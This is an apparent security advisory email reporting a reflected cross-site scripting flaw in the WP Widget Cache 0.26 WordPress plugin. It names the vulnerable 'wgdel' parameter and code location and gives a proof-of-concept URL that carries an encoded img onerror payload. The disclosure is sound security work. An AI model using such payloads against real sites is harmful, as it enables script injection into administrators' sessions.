Subject: Cross-Site Scripting (XSS) in WP Widget Cache 0.26
Date: Tue, 25 Aug 2015 11:21:18 +0200

Hello,

Plugin: WP Widget Cache 0.26 https://wordpress.org/plugins/wp-widget-cache/

1. Reflected Cross-Site Scripting (XSS)

Authenticated administrators can inject html/js code (there is no CSRF protection!).

Method: GET
Url: http://localhost/wp-admin/widgets.php?wgdel=[xss]
Vulnerable parameters: wgdel

Example PHP callstack:
WidgetCache::widget_wgdel_notice   [/wp-widget-cache/widget-cache.php:332]

Verification:
http://localhost/wp-admin/widgets.php?wgdel=%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E


--
Regards,
Marcin Probola,